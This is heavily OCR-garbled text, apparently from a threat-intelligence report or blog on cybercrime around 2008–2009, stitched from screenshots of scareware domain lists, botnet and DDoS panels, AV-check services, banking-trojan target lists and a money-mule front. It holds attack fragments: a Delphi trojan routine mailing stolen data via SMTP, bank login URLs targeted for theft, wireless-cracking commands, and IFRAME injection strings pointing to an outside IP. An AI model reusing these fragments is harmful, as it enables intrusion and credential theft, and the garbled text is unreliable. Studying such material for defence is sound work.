7.0.17.0 
31.6.6632 
4.4.4. 56 
8.0.14470.0 
3.120.0.0 
19 
T3.1.1.64.0 
11.0.800 
7.10.798 


OGnoBneHne 
2009.07.22 
2009.07.22 
2009.07.22 
2009.07.22 
2009.07.22 
2009.07.21 
2009.07.22 
2009.07.22 
2009.07.22 
2009.07.22 
2009.07.21 
2009.07.22 
2009.07.21 
2009.07.22 
2009.07.21 
2009.07.22 
2009.07.22 
2009.07.22 
2009.07.22 
2009.07.22 
2009.07.21 
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Reuate pesymptatos 3) 


Pezynetat 
Worn. Zhelatin! IK 


VORM/Zhe latin. Gen 


W32/Zbot.I.gen'Eldorado 


Win32.WORMZhelatin 


¥32/Zbot. I. gen'Eldorado 
Worn. Zhelatin 


pad 14174 


sarpyane 3964(29%) 


orerye (0%) 
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pad 14174 
sarpyaor 3989(29%) 


orcryx 90%) 


Onepaunronmian cacresa| Kore~ectno tpapexa| mpoGrro 


Windows NT 41 Is las ) | 


Mac OS; o(o%) 
Windows 98: av7 144(31%) 
Windows 2000: 35% 153(43%) 


Windows 2003 : ]33 J13¢40%) | 


20 (0%) 


| 3678(29%)| 


Windows ME + 1 0(o%) | 
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Bypassing of web filters by using ASCIl Exploit By CoolDiyer 
This Site may harm your computer. — 


Bypassing of web filters by using ASCII Exploit By CoolDiyer 


Vadaoesd GoaVegedds”” Ad6B+i+idseuBAil adaidi6Baad ; advia reg 
Byes SAdESIUS HBGIMS WdIAUHS 4640656 eso gee i al diadeii e7éd ... 


OO}htmOOOO00 00&00 OOOOO0D - powered by... 
<title>Bypassing of web filters by using ASCII Exploit By eetteee 


picid edith TUSCOEGCUUDOESCORGUCRSCEcOUOOuOna:. 


Bypassing of web filters by using ASCII Exploit By CoolDiyer 
46° AMSTEL TOLL °A¥SUT=¥G", E46? AM ETO TALKS TOTO Axa ze 
¥OUAARS*AMOT HOT HOT 40TH AMS AA MO AAG AR STR ... 


www. feetbig.com/ - 9k - Cached - Similar pages 


Bypassing of web filters | by using ASCIl Exploit By CoolDiyer 
Yadi%S 4640656 idigdaca4¢OAOSNeSde%S TT aooid oaadia 14965 Ses al Ya 
8668 ~—-ciddai@ar cau éiacad iiaMsdcdS S&S O46 aw %.. 


For instance, a sampled domain such as housedomainname .cn/in.cgi?6 redirects us to 
securityonlinedirect .com/scan.php?affid=02083 which is [6]serving scareware with hosting 
courtesy of AS10929 Netelligent Hosting Services Inc, which in case you remember popped-up 
in the [7]Diverse Portfolio of Fake Security Software - Part Twenty. At securityonlineworld .com 


(209.44.126.22) we also have a portfolio of scareware domains: 


thestabilityweb .com 
securityonlineworld .com 
websecuritypolice .com 


wwwsafeexamine .com 


dynamicstabilityexamine .com 


networkstabilityexamine .com 
safetyscansite .com 
onlinesafetyscansite .com 
securityscansite .com 
stabilityonlineskim .com 
socialsecurityscan .com 
securityexamination .com 
internetsecuritymetrics .com 
onlinebrandsecuritys .com 
securityonlinedirect .com 
scanstabilityinternet .com 
stabilityaudit .com 
websecuritybureau .com 
safewebsecurity .com 
webbrowsersecurity .com 


futureinternetsecurity .com 
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BE BC - [Feud (memes Soke x) [13394] [-mbknste]: scan 71.66 xx] ir) x] 
_| Fle ew Fevortes Took Commands Window Help a 
AF SPeo AGwWSSrwe ste vs STS 2 
—_——— a — jake = 


@onicx “ 


(14:31) © Mow talking fn Sauke 
[14:31) « sets mode: +santity 
* Retriewing Geeke nodes... 


(14:36) © Semicx changes topic te *.scam 71.66.x.x° 

[14:96] * ) has joined 

[14:96] * j2-CNOO1IF ace 

joined an 

RRITLITTE comes  __aaueeemmeaee ea 

[14:96] * ; 
eee __ ae 

ee ie 

[14:96] + [ a5 joined tn 

[14:96] « 

ie 
ae 
ee 
aT 

| \\ \\ | * | A AEE | NS ma 

[14:96] + has joined &n 

[14:94] - astlink.ca) 
nan 

[14:96] = [ has joined 

[14:36] + [ lsance 

[14:96] + 51 kim 

[1 \ || | = | a EIT 

[14:96] * jetstreas.x — - 
[14:37] * asw.bigpond.net.au) has joined Snuke 

(18) er LTT 1 ves.rr.com) has joined Souke 

[23:37] = Quit (Conmection reset by peer) 

[14:37] * epis.quest.net) has joined Snuke 

[14:37] + cal.res.rr.com) has joined Bnuke 

[14:37] * antelecom.net) has joined Snuke 

[14:37] * @sl .klmazal.ameritech.net) has joined Snuke 
[14:37] * @s1.kimzmi.ameritech.net) has joined Snuke 
[18:37] * ue .woosh.co.nz) has joined Snuke 

[ia:37] « [ @slextreme.com) has joined Snuke 
0) as chro net .br) bes joined fouke ¥ 
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‘ AbiWord Word Processor 
__|@ Gnumeric Spreadsheet 


» @ KPresenter 

» “@ OpenOffice.org Base 

» & OpenOffice.org Calc 
Games > “\ OpenOffice.org Draw 
| Graphics > = OpenOffice.org impress 
@& Internet » = OpenOffice.org Math 

» =. OpenOffice.org Writer 
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Mun Thy Wrope Select View Tools Carers Sernny 
SSUCORFSESAAT 
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Skipped Hes: 0 Data scanned: 0 
Scanned files: 0 Scanned folders: 0 Elapsed time: 0 
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superiorinternetsecurity .com 


The [8]fake codec at video-info .info (AS29371 - gaztranzitstroyinfo LLC) is in fact down- 
loaded from kir-fileplanet .com - 91.212.65.54 (AS48841; EUROHOST-NET) where more 
malicious activity is easily detected at: 


downloadmax .org - 91.212.65.19 
hd-codec .com 

shotgol .com 

kauitour .com 

coecount .com 

countbiz .com 

videoaaa .net 

7stepsmedia .net 

ispartof .net 

amoretour .net 


browardcount .net 


trucount3000 .com - 91.212.65.10; 91.212.65.29 
trucount3001 .com 

trucount3002 .com 

antivirus-xppro-2009.com 

onlinescanxppp .com 

onlinescanxpp .com 

onlinescanxp .com 


free-webscaners .com 
2258 
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yi What AV-Software Are You Using? 


Free Software 


13 73 
Chargeable Software 
§50 23 


lIlegal / Cracked Version 


382 159) 
Trial Version 
143 6% 7 


Promotional Version (e.g. from magazine) 


91 33% 
| do not use AV-Software 
80 33% 


| do not know 


17 0.7% 


Number of Voters : 2396 


First Vote : Tuesday, 30 June 2009 15:21 
Last Vote : Tuesdav. 14 July 2009 08:05 
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Antivirus 
Antivir 
ArcaVir 
Avast 
AVG 
BitDefender 
ClamAy 
DiWeb 
eScan 
F-Prot 
F-Secure 
Kaspersky 
McAfee 
Nod32 
Panda 
Sophos 
Symantec 
VBA32 
VirusBuster 


Version 


2.1.11-49 
105 
10.8 
75.50 
7.60825 
0.91.2 
4.44.0.10150 
2.0.8 
6.2.1 
5.53 
5.7.13 
2.1.11-49 
2.16-2 
9.04.03 
425.0 
1.0.3.8 
3.12.25 
1.3.4 


Balance: 20$ | Logged as: test | 


Service Loa @@ . .. wu 


Scanning Finished 


DatabaseVersion 


2008-02-04 
2008-02-04 
2008-02-03 
2008-02-04 
2008-02-04 
2008-02-04 
2008-02-03 
2008-02-02 
2008-02-04 
2008-02-04 
2008-02-04 
2008-02-01 
2008-02-04 
2008-02-03 
2008-02-04 
2008-02-04 
2008-02-04 
2008-02-04 


Additional information 


FileName: lo.exe 
FileSize: 3638 bytes 


Resutt 
TR/Agent. 3638 


Trojan horse Downloader. Small. BIY 


Generic. Malware. did!! 3E3550AE 
DLOADER .. Trojan 
W32/Downloader.gen10 


Generic. ff trojan 


Virus Mal/DownLdr-F* 


MD5: addScSeadda0caa482bb4353ab3233eb 
SHA: 4ef7341ed4525a8ce2f20033cb2dd6dd84099694 


TotalResults: 7/18 


[0  Prscouri.._ | 


acta 


Av-check.com 2008 (c) 
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Antiirus 


Antivir 
ArcaVir 
Avast 
AVG 
BitDefender 
ClamAy 
DrWeb 
eScan 
F-Prot 
F-Secure 
Kaspersky 
McAfee 
Nod32 
Panda 
Sophos 
Symantec 
VBA32 
VirusBuster 


Balance: 20$|Loagedas:test| ServiceLoat @@ 9 ou 


Scanning Finished 
Version DatabaseVersion Resutt 
2.1.11-49 2008-02-04 TR/Agent.3638 
1.0.5 2008-02-04 - 
1.0.8 2008-02-03 -- 
7.5.50 2008-02-04 Trojan horse Downloader. Small. BIY 
7.60825 2008-02-04 Generic. Malware. did!! 3E3550AE 
0.91.2 2008-02-04 _ 
4.44.0.10150 2008-02-03 DLOADER. Trojan 
2.0.8 2008-02-02 -—- 
6.2.1 2008-02-04 W32/Downloader.gen10 
5.53 2008-02-04 - 
5.7.13 2008-02-04 - 
2.1.11-49 2008-02-01 Generic. ff trojan 
2.16-2 2008-02-04 -- 
9.04.03 2008-02-03 -- 
4.25.0 2008-02-04 Virus 'Mal/DownLdr-F" 
10.38 2008-02-04 - 
3.12.25 2008-02-04 -- 
1.3.4 2008-02-04 — 
Additional information 


FileName: lo.exe 
FileSize: 3638 bytes 
MD5: addS5c5eadda0caa482bb4353ab3233eb 
SHA1: 4ef7341ed4525a8ce2f20033cb2dd6dd84099694 
TotalResults: 7/18 
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180,00 
ay MAltacks 

” 

160,00 
2500 140,00 

120,00 
2000 

100,00 
1500 s000 

60,00 
1000 

40,00 
500 2000 

173 1% 1% 13 116 105 103 102 8 92 @ 64 +“ 


$ 


° , & SL SS 
LIL SE a i Ce ae A 3 #8 
we 
a 
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AVICASH Alliate Program - Makes money with phagin inet all? 


11-08-2006 11-28-2006 


We have a new rates! New update for SE 
PIU CA and 


SIGN UP! care 


NOW AND 


( WEEKLY 
PAYOUTS 


room 
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AYYILDIZ TEAM 


YA_OLUM 


DELTA FORCES TEAM 


BUNDAN OTES 
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ay. e Sire 


|) C:\Documents and Settings\vBlax\My Documerts\Suicide, 1.6 ful 


1 deleted ededehehehsheteleieleh 


SUICIDE DOS ne 
module: index. 
(c) Crésh 

wow. cr4sh.h1l5.ru 


eB Bf fr Br Br Br BB Br Br Be Br BH mH? 


iy esses L 
$user = “admin”; 


SUICIDE DOS Engine 
module: options. php 


(ol. | ¢) cr4sh 
spass ~ “—_"; < ies 
abaiy, 17 éfba-aiee 4707041, 147044-apu th kkkbbede 


ximeout = 120; 
/ =ahoioa fattaeaiey A0da1 606 
 slnamaaei «15; 

s 


Se us: 

2 Seat ase Baron rare 
as n i: ? 

Srefer = $_SERVER(" SCRIPT_NAME"); 

if Siogin { 

if (Sluser «= $user && $lpass «= $pass 
1 st Nl aaa $pass); 


“suicidex. extra. sql"; 
“suicidex”; 


del 


| } options.php -... 
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Sh=2009-10-06_uayrl. 


image/aif 


image/aif 


image/gif 


[180] 
22561 


vis 


“Home [ my xccoun 


Shop Domain Manager Renewal Manager Juantity Discounts Customer Settings 


Domain View: 2 Sort Domains: — Search For: 
alphebeticlist =F» | Suber | 


Pages 122456122910 > Goto, | 


> 1448 Domains - Displaying 25 per page - Alphabetic List - Page 1 of 58. 


1, debe Mh th om.com 24-May-2004 24-May-2014 Baa 
1 janat ss on ‘eit 29-Jul-2005 29-Jul-2014 Baa 
« Mde wh m Active 13-May-2004 25-Feb-2012 BBA 
a Mde w hi o Active 06-Mar-2005 26-Dec-2011 Ban 
a ide woh t Active 13-May-2004 25-Feb-2012 BEA 
a esbe m iss m Active 10-Mar-2008 10-Mar-2011 BBA 
al emo: ft .© } Active 17-Oct-2005 17-Oct-2012 BEA 
a wmod ip ce Active 17-Oct-2005 17-Oct-2012 BBA 
a leur is wt om Active 07-Now-2004 12-Dec-2010 BBR 
m leurs is wt wt Active 07-Nov-2004 12-Dec-2008 BBA 
a snilfs oF Active 13-May-2004 10-Dec-2011 BBA 
a anilfs fe Active 06-Mar-2005 26-Dec-2011 Ban 
am sniifs ot Active 13-May-2004 10-Dec-2011 BBA 
a mits m Active 14-May-2004 10-Dec-2011 Ban 
a milfs fo Active 06-Mar-2005 26-Dec-2011 BBR 
= mis 4 Active 13-May-2004 10-Dec-2011 BBA 
a vee 54 Mm Active 03-Aug-2006 20-Nov-2010 BBR 
m 35%: 0 Active 07-Nov-2004 23-Jul-2009 BBA 
a wade 29 Active 06-Jun-2007 16-Apr-2010 Gan 
m wade 201 Active 06-Jun-2007 16-Apr-2010 Baan 
® atho 20} Active 14-Nov-2003 14-Nov-2011 BBB 
a atho 1 Active 14-Nov-2003 14-Now-2011 BaR 
a thon Active 14-Nov-2003 14-Nov-2011 BBA 
# dhon # Active 14-Nov-2003 14-Nov-2011 BEBA 
a ithon 20 | Active 14-Now-2003 14-Nov-2011 Baa 
Domain = ss Status = Purchased = Expires = Options 
Page: 1224567 2 2 10 >> GoTo: if 
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In cybercriminals | don’t trust. 


Related posts: 


[9]Fake Codec Serving Domains from Digg.com’s Comment Spam Attack 


[10]Lazy Summer Days at UkrTeleGroup Ltd 


[11]Bogus LinkedIn Profiles Redirect to Malware and Rogue Security Software 


[12]Massive Blackhat SEO Campaign Serving Scareware 
[13]EstDomains and Intercage VS Cybercrime 

[14]The Template-ization of Malware Serving Sites 

[15]The Template-ization of Malware Serving Sites - Part Two 
[16]Malware campaign at YouTube uses social engineering tricks 
[17]Poisoned Search Queries at Google Video Serving Malware 


[18]Syndicating Google Trends Keywords for Blackhat SEO 


Related Russian Business Network coverage: 

[19]The New Media Malware Gang - Part Four 

[20]The New Media Malware Gang - Part Three 

[21]The New Media Malware Gang - Part Two 

[22]The New Media Malware Gang 

[23]Rogue RBN Software Pushed Through Blackhat SEO 
[24]RBN’s Phishing Activities 

[25]RBN’s Puppets Need Their Master 

[26]RBN’s Fake Account Suspended Notices 


[27]A Diverse Portfolio of Fake Security Software 
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hangs. Denkng poitben. de! app Tancstatus net do ses 


Letses Logier 25.09 2006 11.36 Un 


Noch 74 gumoe TANS 


Cre abtueten Anpaden tu Prem Sacherhets status 
Tet im Berekh "Einste®ungen” aut 
erherts status 


@ + Uderwetsung vornetenen éer 
@ = Oaweratrag ersieten 

G © Auslandsautrag vormenmen Sechornertesianss © 
* EX=Einzetrorto, GK=Gemeinschatsiorto 


Neu: Hammater Gechenhomdort mit der mTAN . Jetrt hostertos! 


Eintach_m 


cod & richer Baringeschate eriecigen Ab sofort erhaten Se cavertat und undegrenst ihre TAN ats modde TAN hostentos Grett 
per SMS auf Ite Handy! Meigen auch Sie sich nox 


ausgezeictnete mTAN 


neute TUT modden TAN-Vertahren an und numen Sie cee mt dem TUV-Getesteget 


Mite intormapenen © 


aareten | Kactaet 


benkingpostbenkde @ 3500: FP 
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arent (Itau_card. Handle, hBody) : 


ow; 
Titau_card.Create (Self): 


edi=faise; 


k Ch3ck - Informigdo d3 Cr3dito C3rtd e Sigurd++ses) 


SACRE TEE 530 18 Te TrOmBcbeP MDhOs DOs ikOss Bc obsD 1 Rade R7H<S0 AM 
begin 


pohar (Decode64 (*H7vyuGuiieI2¥Oe")): 
egou. Create (self); ' 
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Delohi RE 


acca ecient = 7 
SELLTELTTTTTATLEL TTL EM PRA CATR CATR SUA TMPECT WWAVULUAUL LAURER EAR E EARL ER ERREEAURERERRREARREREAREEARRERERRERARRERERELEAAL 
ow, Recipients. EMatlAddresses i= decodeé4(' PEDKOELESayoCIOUTETSOMMPIBCDIAG')) fwwes++++See Gmail Pare Cais INFECT++++twmmy /// 
SELETTETTTTTELTTETE TE E-MRM WRA CATR CATR SUA TMPECT AWVUUUVUL LAURER UULER RUE RARER ERUER RARER RARER RARE ERRRRARRURERRUEARRURERE UN 
ow, Subject 1*decodeé4(‘kivtiArmjowuBYqr') +’: ‘+ Kiliando.P_es 
} Pow. AuthenticationType:=atlogin: (we***Altemcicephe Certos**===) 

Pow, Host1= decodes4 (' Citing  YVdRNSIR2 ep HeB MD kBowkPorlPanbBcDIRG')s (mee *SNTP yakoot + swe) 
Pow. Username :* ‘usuario’; (w=***See Lowy ID DO YANOO***w==) 
Passvordi= '123456") (wewee*Sae SESMA DO YAMCO*+Cwmm) 

» Pow. Port: "25; 


Pow, AuthenticationType!=atLogins 
\ Pow.Moat:= decodeé4 (' CfingC TvdsNSfRic pANMaOMbkBomkPaslPanbScDiRG'): (9=***Sew SHIT De Taboo’ + +onneennnnnncnns) 
Pow, Connects 
Ld 
| Pow. Send (Pow) s 
xcept 


\_Pow. Disconnect; 


- 


_ega_Pow. Disconnect: 


TT al 


***INPO AQUI POM EN SNTP +++ emmmy 
_ focedure TCHD.Piu Piu(Te: TIteinghist) + 
an 

+ String: 

exo 1 strings 
jutador: String: 
| »_ Pow. Authent tcat tonType: *atLlogin: (mmr errAltemcicephe Certorssse=) 

Pow, Bost i= decoded4 (' CfingC TVdRRSIR cpPi iS kdowmkPaniPanbBodiRG')s (w= o**SNTP yahoot+ sone) 
1 Pow. Username := ‘USUARTO': (m=~"**Sew Lowy ID BO TAMOO**emmm) 

Pow.Passvordi= *123456') (weeee*Sae SENNA DO YANOO++Cmmm) 

1 Pow.Port:"25; 


1_Pow. Connect: 
(elf.close; 


“Ath Pow do 
 egin 
_t9Ktitando.P_e: 

pexo 1* Kiliando.dr + ‘\'+ Kiltendo.P_e +'.txt's 


a en 
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Clique no seu nome para acessar o teclado virtual. & ices do Sogurence 
~ Depots Ge digter seu mimere de 


Se o seu nome nico estiver correto, nio continue arenas aitemmeee tema raee 
2 operacio @ gue para o $08 Bankiine pe enero asm 


P| chqee so sew nome quan 0 teckedbe 


* Crane tio Prcke © LocuhGedes com GOD 1h) 2900-4203 
Demmate ecatedeten C888 £213 14 


Em cine hehs, dos 7 60 24h @ Om Sree Ge Homans © teriedos, des 6 45 224 
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ri @ PSG.exe 


BOG.exe corfb.exe 


- _ 7 
confb 


BBG.cxe 
Npinoweree 


Dee BPR! Block Banker Grab v.1.0.5 Full } 
Paomep: 35,0 KE 
Arpetiyten (Ge 
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benps) wuw, e-gold coen acct balance. asp hems) money yandex mu index ced bps) wuw wok com defauk aspx? 

refererideat= hips, www edestk hsbc.co.uk logosindex japhmps onlies Bordstsb. co.uk mibeld doc benps: wow sevbank alfance- 

bekestes co.uk logis PM4pot! asp hitps) webbenk openplan.co.uk core webbank asp batps: stekey baskofienerica. com sas sgnonSetup dohmps: hark barclays.co.uk cl t LognPasscode.dola 
https: bardeing halifax-caline co.uk Servicing App Select Transfer. asp? hitps: ‘olb2 nationet coms MyAccounts MyAccousts_WP2 asp? hatps: www .sbscigesl com Login aspx? 

hatps olb2 sationet coms sigace SinglePaneStgnon_wp! asp? bitps: www halgax- 

online.co.uk CustomerResets rurCapmureSecunityQuesicas aspx betps: Sank cahoot. com serviet cons aquasias secunty authentication serviet PastiaiPasswordSentethmps: oth? sathonet com sigace 
https: www l basdcng Sst-deect coms 1 2 bitps: od 2 nationet. com sgnon SingkePageSignoa_wp! asp 1D=tatps: orline- 

basiness Boyditsb co.uk mikeld tbe heros: intemetbankcng ab ie bb] rod signontps: www.ecbank hsbe.co.uk serviet com hsbe ib. app pb logon serviet Onl ogonV exiicationServiet 


beeps: ww. nwo lb. com/default.aspx?referer ident «| https: //www. ebank.hsbe. co. eA /Npgontnden, Jon) hxcne ://online. lloydéstsb. co. uk /mtheld. ide} hetps: //www. my 
bank. al liance-letcester. co. uk/login/Pitpointi. asp| https ://webdank. openp lan. co. uk/core/webbank. asp| https ://s itekey. bankof america. com/sas/s ignonsetup.d 
ojhttps://ibank. barclays. co. uk/olb/t/Login@asscode. dol https: //olb2. nat lonet. com/signon/SinglePages ignon_wpl. asp?| htt ps://0lb2. nat lonet. com/MyAccounts 
AMyAccountsS_we2. asp? https: //wew. rbsdigital. com/Login. aspx? | https: //wew, halifiax-ontl ine. co, uk/Customerkesets/rurcapturesecur ityquest ions. aspx| https: // 
ibank. cahoot , com/servlet/com. aquarius. security, authentication. servlet. PartialPasswordsery let [https ://wwel. banking, first-direct = Ceaviay a7 Ihe See Es eont in 
e-business. Dloydstsd. co, uk /miheld, ibe] https: //internet bank ing, afb, 1e/hbi/roi/siqnon| https: //wew, ebank. hsbc. co, uk /serv let /com. hsbc. 1b. app. p16. logon, se 
ev let oncogonver if icat ionserv let] 


httpssignin. ebay. dewseBay1S4P1. d} lwew. google. comcodesear chbark 
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Servers Available 


— = = 


Single VPN - $1/day, $20/month 
Double VPN - $1/day, $30/month 


Unique IP - $5/month 
Signup Now ! 
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Ges Search bet (mach: id, ©, courtry): cad 


Stats Bots O- Ver Cory . Satu fret \etore 
2s ae 6 ' 4 Bou free 2OS01.08007232 Wot 0RIT2 
oT ope: 6 2 4 Pbcornde Free 2008-01.08004510  2008-01.08.08.97-20 
OFFLINE: o ? 4 Hired Free 2000-01.08062312 2000-0108 0897-20 
free 6 ‘ 46 Bxygcen Free 2ORO1-08080I99 2008-01-08 0837-20 
a Werte 6 s 4 MBP ntian Federaner Free 2000010808 9068 2008.01.08 08:37:20 
6 ‘ George free 2OR01080R0213 200901.08 0837-20 
tetas Ge Creete new task 
OC Adsrem tack GO Oelete tak Search bent: Host{:port}; Bots: 
t.~ moar Dots twee aut 
) wr om ar 3008-12-20 puke Tye: 
2 geogeru ones ar oe He 
[Bh Add Task Loads x Raterer: Sate 
- 
Narre: Post: Set 


awe Couery entane th 12 
Corry =! 
1) US eeu 


nya. 


DM 
(Baas) [picaree J 
— ys a 


Lint mal on one bot 1 4 Pepe: oft 


_ Tb AGE Ternptate tor SPAM Task 


Setect Senders List 


Servers Lists Select Servers Ust Version: 4 
Cree hare ee Lemgeate wd gmat hee RP 
Teerchine: qwel ~ eo Uisoted 2a the torte mat Fle: lect fhe 
Upoased Sant, Sm he for ond mak 
Status: active - Wr hemt mal ated mage cat phat Bt) EIEN mat 
ed weet name ts Nem (Gann) 
fed qheet oot. 0. cr. de te ed ae tee Update 


- 


1 Ces Search bet (masks id, ©, country): cad 
Stats Bots &- Ve Corby a Sa frettee Lact ome 
7 ant 6 ' 4 Bou free 2OS01.080022%2 2090too OBIT 
] ope: ‘ 2 4 Beicorede Free 2008-01.08004510 2000.01.08 08:37:20 
OFFLINE: ° 2 4 Hires Free 2000.01.08063312 2009-04-00 0837-20 
free 6 ‘4 4 Bixygorem Free 2008-01-08080029 2000-01-08 0837-20 
i‘ Werta LJ 5 £ MBS nt Feder ater Free OOR-08 081068 2000.01-08 08:37:20 
Coury: x a ‘4 oh Gncn pe free 20020108 080213 2009-0108 083720 
Mh Vasks Ge Create new tavk 
Ad ree tach Delete tak Search bent: 
° ° Host{-port}: Bots: 
f.~ "ost Oete Tye Set 
1 wr one or 2008.12.20 Path: Tye: 
2 qoogery nen on 3008.12.31 pe 
Gh Add Tack Lends x Rasterer: aba 
» 
Name: post: Bet 


Pret Convery ortand tt 1 on 
Gerrgies a 
1) US cer : 


M34. 


DV 
Fle: Select tho 


foe! i + + 


_ BE AGH Template bor SPAM Task 


Setect Senders 


Lust 


Servers Ust> Select Servers Ust Verso 4 
Pee are ee Tempe aes gre Sone Rh 

Tercite qwel - Uploaded 2 the tor test ma Fie: Setoct ho 
Uploaded end Atm the for Rend mat 

Status: active ~ ee ee | 
WS eet Same rte Sete 

SS And pleas GO, 2. car. doo. xia and ate. for atch ie 
(iss) (S carate tse) (5 coneet_) 7 


[190] 


22568 


~ Loads 


@ Adinewioed ©@ Delete toed 


rtp ay 125 Wer Ba tage (1} 1398130702 0.47 139813 2000-02.0F 13.9913 


epee 12323 Mee Re tore 


(1} 139814 07-02 S O24) 139814 2009-02-07 13.90.16 


(1) 139815 07-09.2008 c247 139015 =. 3008-02.08 1207 
Add Load Loads 
{1} 139816 07-02.2008 c027129016 wOeOD0T 136016 
o247 13:90:16 
0247 129817 
one? 125920 
bet net 


Bets Bats 


7 Update Dusit 
Ms BE ttetress «i Clear stats «= Clear of 
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Check interval: 5 
IP-number: 212: 
Total uptime: 99.9 


Uptime for 


www. bbc.co.uk 


RIB Home 


B About GIGRIB 


@ How it works Month summary 


@ How to get 


@ Download amen 


From To Downtime Month Up downtime 
@FAQ 2008-11-05 20:28:15 2008-11-06 20.34.07 7m Nov $9.33%, 1h 36m 
@GIGRIB Sign up 06 19:16:44 6 20.11:57 55m Oct %, 19m 
06 18:49:42 2008-11-06 1855-10 Sm Sep 3m 
Hote: GIGRIB is completely separate trom the 2008.11.05 182326 11.06 1845.02 21m Aly 99.95%, 21m 
Comener ciel Pinadom urie mongering 2008-11-02 15:16:41 2008-11-02 15:23:38 am rT) 99.99%, Sm 
Rervice. The commercial service has 
Separate network of mondoring s th 35m An 
more feabures, and the information is not Mw. 99.95%. 21m 
" Rear ore about how GIGRIB determines a . 1o 
public thodology: Read more about now GIGRIB determines if 
www bbc CO uk is dowr One » 12m 
Mowe on 


Want more? Feb $3.99%, 2m 


Try the full Pingdom serv 


including ; aw 
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[28]Go to Sleep, Go to Sleep my Little RBN 

[29]Exposing the Russian Business Network 
[30]Detecting the Blocking the Russian Business Network 
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Legitimate Pharmacies Pharmacy Finder ValidateaPharmacy Unapproved Pharmacies 


bestmedvalues.com is an Unapproved Internet Pharmacy: 


Website Summary 


URL: http ://www.bestmedvalues.com 
Registrar: Moniker 


Approval Status: % unapproved (since 05/20/2008) 
Online Status: & online 


Network 


This site seems to be part of the PharmacyChecker network. 


Websites within this network sell something that is available elsewhere for free. As such, we 
consider the website to be deceptive. Furthermore, it refers the user to Internet pharmacies 
that are not acting lawfully. We refer to this website as a “PharmacyChecker referral site.” 
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Warning - this site has been flagged and may contain unsolicited content. 


Home Tools 


The content of this web page appears to comtain spam, or links to unsolicited of undesired sites, 


http://bit.ly9qqHN 
Source: hitovleryspece com 


You can learn more about harmful content at www.StopBadware org 
You can find out more about phishing from www antiphishing org 


Suggestions: 


© Close your browser window 
© Notify the sender of the URL 


Or you can continue to ntovirryspece corny at your own risk 
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date Tus, Oct 27, 2008 at 11.29 Avt 
ubjiect updateMessage 
ciled-Sy srs, bis.na.blackberry.coen 


How to crack wireless network 


' new.oc T 

| This is a test email foam my DiackDeny Weeless Hand 4 34K View at HIME, Open as a Google docurmert cols Needed 

| Sert vie BlockBery fromm TMobile L Ai k sui 
6 aR rtrack suite 


smnobileta@tinoe. blackberty.net te me 
+ Show gated tot - 


Steps to be followed: 
new.ipa 


O2K Yew a new.doe 1. sudo airmon-ng start wlan0 
} 4a 24K View as HTML, Open as a Googie docurnert 2 sudo sirodump-ng ~ testtile wiand 
| a. Note BSSID, Channel #, ESSID 
© Regly > Forward 


Figure 16: The screenshot of email received by an attacker. 
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Table 1: List of Proof of Concepts for BlackBerry. 
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Best Spyware Protection, Used by Millions World Wide: 


every week People woridwide use and trust Personal Antrrus to protect ther PCs tom 
Spyware adware and other onkne threats 


Enhanced performance: 
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browse speeds: 
Less memory use than the average used by " 


Competing products: 


Ease of Installation and Support 
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WOME ABOUT US SERVICES 

@ aF - GROUP 
The company was set wp in 1990 in San Francisco, t 
tuning fnancul edocat and ot Gest 2 was carying t 


MEMBER LOGIN 


WHAT DO WE OFFER 


Brokerage Service 
kerage se 


—_ 


REGISTRATION 


CONTACTS 


UPDATE: The command and control domain has been taken care of courtesy of the brisk 
response of OC3 Networks Abuse Team. 


Next to the efficiency and cost-effectiveness centered cybercriminals having anticipated 
the [l]outsourcing (Cybercrime-as-a-Service) model a long time ago, there are those self- 
serving groups of cybercriminals which engage in literally each and every aspect of cybercrime 
- [2]money mule recruiters in this very specific case. 
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nothing interesting happend recently... 


» Application Managers Logged in user: admin 
Welcome to Cache status: 
fresh 
Please select one of the above sections in order to perform the appropriate tasks Cache age: va 
A short description of each section should be found on the sections’ index page [refresh cache} 


WordPress 


[220] 
nothing interesting happend recently... | 
Logged in user: adain 
Mackets Edit Market cell phone Cocho satus: 
Cache age: nla 
Market name: [cell phone (refresh cache ] 
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Market keywords: 
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Global Market feed(s): 
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What do the known money laundering aliases such as Value Trans Financial Group, Inc. 
(valuetrans.biz); Advance Finance Group LLC (af-g.net); ABP Capital (abpcapital.com); Pre- 
mium Financial Services (advance-financial-products.org); eTop Group Inc. (etop-groupli.cc); 
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Finance Group LLC (af-g.net); DC Group Inc. (dc-group.cn); IBS Group Inc. (ibsgroup.cc; 
ibsgroupli.cn) and FCB Group Inc. (fcb-group.cc) have in common? 


It’s a 31,000 infected hosts botnet which they use exclusively for spamming. 
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join Blippy Q Business or user 


purchases 


Depoutary 


The money laundering organization describes itself as: 

"The company was set up in 1990 in New York, the USA by three enthusiasts who have financial 
education. The head of the company was Karl Schick. At the very beginning of its business 
activity the company provided fairly narrow range of services at the investment market. 
Within 15 years of hard work the company has acquired international standing and managed 
to develop into a global financial holding with the staff of 3,000 people and headquarters in 
more than 100 countries of the world." 
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search. bloomingdales.com/, ,./789.149.243 201A%3E - 66k - Cached - Similar pages 


Bloomingdale's: CURSE-GAMING IFRAME src=/89.149.243.201/t... 
Sorry, we did not find any results for CURSE-GAMING IFRAME src=//89.149.243.201/. 
Search Again. Please try again using an alternate spelling or keyword. ... 

search: bloomingdales.com/...//89.149.243.201/%3E - 66k - Cached - Similar pages 


Bloomingdale's: WENDY-VVILLIAMS IFRAME src=//89.149.243.201/t ... 
Sorry, we did not find any results for WENDY-VWILLIAMS IFRAME srce=//89.149.243.2014. 
Search Again. Please try again using an alternate spelling or keyword. ... 

search. bloomingdales.com/.../789.149.243.201A%3E - 66k - Cached - Similar pages 


Bloominadale's: BILLY-JEAN-MICHAEL-JACKSON IFRAME src=//89.149 ... 
Sorry, we did not find any results for BILLY-JEAN-MICHAEL-JACKSON IFRAME 
src=//89.149.243.2014. Search Again. Please try again using an alternate spelling ... 
search. bloomingdales. com. ..//89.149.243.2014%3E - 66k - Cached - Similar pages 


Bloomingdale's: AUCTIONEER IFRAME src=##89.149.243.201/t ... 

Sorry, we did not find any results for AUCTIONEER IFRAME src=//89.149.243.201/t. Search 
Again, Please try again using an altemate spelling or keyword. ... 

search bloomingdales.com/exec/?PseudoCat=b. comSearch&q=AUCTIONEER%20% 
SCIFRAME%20sre=//99. 149.243.201A%3E - 86k - Cached - Similar pages 


Bloomingdale's: ATLASLOOT IFRAME src=//89.149.243.201/t... 

Sorry, we did not find any results for ATLASLOOT IFRAME src=//89.149.243.201/t. Search 
Again. Please try again using an altemate spelling or keyword. ... 

